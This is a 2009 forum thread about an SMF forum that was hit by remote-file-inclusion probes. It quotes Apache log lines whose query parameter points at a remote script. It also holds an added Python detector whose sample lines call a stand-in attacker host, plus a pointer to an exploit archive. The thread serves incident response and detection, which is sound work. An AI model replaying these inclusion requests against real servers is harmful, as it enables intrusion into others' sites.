
My forum was hacked

Started by mark_vstep, January 26, 2009, 07:20:11 AM


mark_vstep

Our forum running SMF 1.1.7 has just been hacked (or attempted to)

The log file shows:
www.forumurl.com 202.157.175.4 - - [26/Jan/2009:11:00:11 +0100] "GET /FOLDER_TO_SMF/index.php/?jssShopFileSystem=hxxp:www.aerothaiunion.com/sik.txt [nonactive]? HTTP/1.1" 200 14877 "-" "libwww-perl/5.801"
www.forumurl.com 202.157.175.4 - - [26/Jan/2009:11:00:13 +0100] "GET /?jssShopFileSystem=hxxp:www.aerothaiunion.com/sik.txt [nonactive]? HTTP/1.1" 302 5 "-" "libwww-perl/5.801"
www.forumurl.com 202.157.175.4 - - [26/Jan/2009:11:00:19 +0100] "GET /FOLDER_TO_SMF/?jssShopFileSystem=hxxp:www.aerothaiunion.com/sik.txt [nonactive]? HTTP/1.1" 200 14877 "-" "libwww-perl/5.801"

Apparently they have tried to hack into the webserver via the forum engine and tried to install a virus/trojan.
Does anyone have an idea how we can solve this?
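The log lines in the post have the classic shape of an automated remote-file-inclusion probe: a query parameter (jssShopFileSystem) whose value is itself a URL pointing at a text file, sent by a library client (libwww-perl). As an added example that is not part of this thread, of SMF, or of any tool mentioned here, the following Python script parses Apache vhost_combined lines and flags exactly that shape, so an administrator can pull every such probe (and the source addresses behind them) out of a log instead of reading it by hand. The hostnames and IP addresses in the embedded sample lines are constructed placeholders, and the parameter splitting on both & and ; is there because SMF's own URLs use semicolons (for example action=profile;u=5).

```python
"""Flag remote-file-inclusion (RFI) probes in Apache access logs.

Added example for this thread; not SMF code. It detects the pattern visible
in the posted log: a query parameter whose value is a URL, sent by an
automated client. Hostnames and IPs below are constructed placeholders.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample lines in Apache's vhost_combined layout, modelled on the
# entries in the post. The two probes from 192.0.2.10 should be flagged; the
# two ordinary SMF requests should not.
SAMPLE_LOG = """\
www.example.invalid 192.0.2.10 - - [26/Jan/2009:11:00:11 +0100] "GET /forum/index.php/?jssShopFileSystem=http://attacker.invalid/sik.txt? HTTP/1.1" 200 14877 "-" "libwww-perl/5.801"
www.example.invalid 192.0.2.10 - - [26/Jan/2009:11:00:13 +0100] "GET /?jssShopFileSystem=http://attacker.invalid/sik.txt? HTTP/1.1" 302 5 "-" "libwww-perl/5.801"
www.example.invalid 198.51.100.7 - - [26/Jan/2009:11:02:40 +0100] "GET /forum/index.php?topic=12.0 HTTP/1.1" 200 22310 "-" "Mozilla/5.0"
www.example.invalid 198.51.100.9 - - [26/Jan/2009:11:03:05 +0100] "GET /forum/index.php?action=profile;u=5 HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
"""

# vhost_combined: "%v %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\""
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that is itself a URL is the hallmark of an RFI attempt.
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://|^//", re.IGNORECASE)

# Library / scanner user agents that rarely belong to a human visitor.
AUTOMATED_UA = ("libwww-perl", "curl/", "python-requests", "wget/")


def parse_line(line):
    """Parse one vhost_combined line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def query_params(target):
    """Yield (name, value) pairs from the request target's query string.

    Splits on both & and ; because SMF builds URLs like action=profile;u=5.
    """
    query = urlsplit(target).query
    for part in re.split(r"[&;]", query):
        if not part:
            continue
        name, _, value = part.partition("=")
        yield name, value


def inspect(rec):
    """Return the reasons this request looks like an RFI probe (empty if clean)."""
    reasons = []
    for name, value in query_params(rec["target"]):
        if REMOTE_URL_RE.search(value):
            reasons.append("remote-url-in-parameter")
            rec["param"] = name
            rec["remote_url"] = value.rstrip("?")
            break
    if reasons and any(tag in rec["ua"] for tag in AUTOMATED_UA):
        # Only escalates an already-suspicious request: a library UA alone
        # is not evidence of an attack.
        reasons.append("scanner-user-agent")
    return reasons


def analyze_log(text):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = inspect(rec)
        if reasons:
            rec["reasons"] = reasons
            findings.append(rec)
    return findings


def by_source(findings):
    """Count findings per client IP so a scan from one host stands out."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['time']} {f['ip']} {f['param']} -> {f['remote_url']} "
              f"[{', '.join(f['reasons'])}] status={f['status']} size={f['size']}")
    print("per source:", dict(by_source(hits)))
```

Run it against a real log with `analyze_log(open("access.log").read())`. Note that a 200 response to a probe like this, as in the posted log, only means the forum answered the request normally; whether the remote file was ever included is a question for the PHP error log and file-system review, not for the access log alone.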

Rumbaar

They either successfully did or attempted, which one was it?

If it was 'just' an attempt you'll find that scripts target sites every day. Most are just random and automated, so as long as you are fully up to date and secure you shouldn't have much to worry about.

You can't do anything about anyone attempting, just making sure you are fully secure.  Software and host.
"An important reward for a job well done is a personal sense of worthwhile achievement."


mark_vstep

Unfortunately they have been successful.
The webserver was overloaded and went offline approx. 3 minutes after this hack.

We have immediately changed all passwords, restored the server to a previous state and brought it back online.

I can understand that the attempt was probably 'accidental'.

According to hxxp:www.security-database.com/cvss.php?alert=CVE-2007-0232 [nonactive] the hack attempt should only affect systems with the "Jshop Server 1.3" installed, however other than SMF 1.1.7 there are no websites running on that particular webserver.
I think that is worth some investigating; that is why I posted it here and submitted the unaltered Apache log.

Rumbaar

Well a hack of SMF wouldn't overload a server.  Are you sure the server itself wasn't the target of some other DOS attack?  Also were they able to gain access to SMF systems after this attack?  Was SMF affected in any way?

But yes that attack appears to target a specific installed application, so if it's not present will not be successful.
"An important reward for a job well done is a personal sense of worthwhile achievement."


gravyface

Go to hxxp:www.milw0rm.com [nonactive] and search for "simple".  You'll find tons of 0-day exploits for this forum: core and add-ons.

Rumbaar

I don't think 'tons' of exploits are currently around for the latest version of SMF, so that's an overstatement. As for add-ons, we can only do our best to inform the community on those. We have no control over third-party code.

But ultimately the target of the log isn't a known SMF exploit.
"An important reward for a job well done is a personal sense of worthwhile achievement."

